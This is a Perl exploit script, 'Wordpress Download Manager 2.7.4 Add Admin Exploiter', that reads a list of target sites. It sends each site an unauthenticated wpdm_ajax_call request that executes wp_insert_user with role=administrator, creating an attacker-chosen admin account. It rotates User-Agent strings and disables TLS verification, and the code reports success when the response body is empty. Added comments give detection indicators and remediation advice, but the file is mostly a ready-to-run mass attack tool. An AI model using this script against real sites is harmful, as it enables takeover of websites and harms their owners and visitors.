Wordpress Download Manager 2.7.4 Add Admin Exploiter
#!/usr/bin/perl
use LWP::UserAgent;
# Coded By M-A
# Greet's : My Brother Rab3oun & Boy & All Sec4ever Menber
# Perl Lov3r :)
# Human-readable start time; printed once in the "[+] Started" line further down.
my $datestring = localtime();
# Broken-down local time. None of these fields is read anywhere in the visible script.
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
# Return one User-Agent string picked at random from a fixed pool of six
# desktop-browser strings. Takes no arguments.
#
# Detection note: because the header value changes from request to request,
# a rule keyed on User-Agent will not reliably match this tool's traffic;
# the POST fields sent by expadd() are the stable indicator.
sub randomagent {
    my @agents = (
        'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
        'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31',
    );
    # rand() yields a fraction below the pool size; int() makes it an index.
    my $pick = int(rand(scalar @agents));
    return $agents[$pick];
}
# Print the banner, then read three lines through the bare <> operator
# (standard input, or files named on the command line): the path of the
# target list, and the account name and password that expadd() will submit.
flag();
print "[+] Enter List Of Target : ";
chomp (my $list=<>);
print "[+] Enter User : ";
chomp (my $user=<>);
print "[+] Enter Password : ";
chomp (my $pass=<>);
print "[+] Started : $datestring\n";
# NOTE(review): mode and path are concatenated into one argument, so this is a
# two-argument open: the typed path is parsed by open() rather than taken
# literally (surrounding whitespace is stripped, and a leading '&' is treated
# as a handle duplication). The three-argument form avoids that.
open(my $arq,'<'.$list) || die($!);
my @site = <$arq>;
# Drop empty lines. Entries still carry their newline here; it is removed by
# the chomp inside the loop. Whitespace-only lines are not filtered.
@site = grep { !/^$/ } @site;
close($arq);
print "[".($#site+1)."] URL to test upload\n\n";
my $i;
# For each entry: number it, prepend http:// when it has no http/https scheme,
# and pass the resulting URL to expadd(), which sends one POST to it.
foreach my $web(@site){$i++;
chomp($web);
if($web !~ /^(http|https):\/\//){
$web = 'http://'.$web;
}
print "[$i] $web \n";
expadd($web);# one request per listed URL
}
# Send the add-user request to one URL and print a verdict.
#   $_[0] - target URL, used exactly as the caller passes it
# Reads the file-scoped $user and $pass.
#
# Defender notes: the request is recognisable by its POST fields
# (action=wpdm_ajax_call, execute=wp_insert_user, role=administrator), not by
# its User-Agent, which is randomised. Presumably the plugin version named in
# the banner (2.7.4) runs the function named in "execute" without checking who
# is asking -- confirm against the plugin source. Sites that logged such a
# request should be audited for unexpected administrator accounts and moved
# to a plugin release later than the one named in the banner.
sub expadd{
my $useragent = randomagent();# random User-Agent for this request
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });# TLS hostname verification is switched off
$ua->timeout(10);
$ua->agent($useragent);
print "[Testing] $_[0] \n";
# Content_Type 'form-data' makes the POST a multipart/form-data body; the
# Cookie pair passes an empty Cookie header field.
my $body = $ua->post( $_[0],
Cookie => "",
Content_Type => 'form-data',
Content => [action => "wpdm_ajax_call", execute => "wp_insert_user", user_login => $user,
user_pass => $pass, role => "administrator",]
);
my $html =$body->content;
my $string_len = length( $html );
# The verdict rests only on the length of the response body: the HTTP status
# is never examined, so a "[OK]" line is not proof that an account was
# created. NOTE(review): 'eq' is a string comparison applied to a number.
if ($string_len eq 0){
print "[+] Payload successfully executed\n";
print "[OK] Exploiting Success\n";
print "[!] User = ".$user."\n";
print "[!] Pass = ".$pass."\n\n";
}
elsif ($string_len != 0){
print "[-] Payload failed : Not vulnerable\n";
}
# The two tests above cover every defined length, so this branch is
# effectively unreachable.
else {
print "[.] HTTP Error Not Found \n";
}
}
# Write the tool's start-up banner (title, author credit, greetings) to the
# currently selected output handle. Takes no arguments; the return value is
# whatever print returns.
sub flag {
    my $banner = "\n[+] Wordpress Download Manager 2.7.4 Add Admin Exploiter \n[*] Coder => M-A\nGreeT's : Rab3oun & All Friends :)\n\n";
    return print $banner;
}